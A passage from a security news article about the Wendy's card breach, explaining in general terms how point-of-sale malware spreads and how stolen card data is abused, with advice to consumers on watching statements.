Berger said the Wendy’s breach was especially painful because the company was re-compromised after it scrubbed its payment systems of malicious software. Many banks and credit unions ended up re-issuing customer cards several times throughout last year after loyal Wendy’s customers re-compromised their brand new cards again and again because they routinely ate at multiple Wendy’s locations throughout the month.

“We had institutions that stopped approving debit and credit transactions through Wendy’s when they were still dealing with that breach,” Berger said. “Our member credit unions were eating the costs of fraud on compromised cards, and on top of that having to re-issue the same cards over and over.”

Point-of-sale malware has driven most of the major retail industry credit card breaches over the past two years, including intrusions at Target and Home Depot, as well as breaches at a slew of point-of-sale vendors. The malware sometimes is installed via hacked remote administration tools like LogMeIn; in other cases the malware is relayed via “spear-phishing” attacks that target company employees. Once the attackers have their malware loaded onto the point-of-sale devices, they can remotely capture data from each card swiped at that cash register.

Thieves can then sell that data to crooks who specialize in encoding the stolen data onto any card with a magnetic stripe, and using the cards to purchase high-priced electronics and gift cards from big-box stores like Target and Best Buy.

Readers should remember that they’re not liable for fraudulent charges on their credit or debit cards, but they still have to report the unauthorized transactions. There is no substitute for keeping a close eye on your card statements. Also, consider using credit cards instead of debit cards; having your checking account emptied of cash while your bank sorts out the situation can be a hassle and lead to secondary problems (bounced checks, for instance).


via:  krebsonsecurity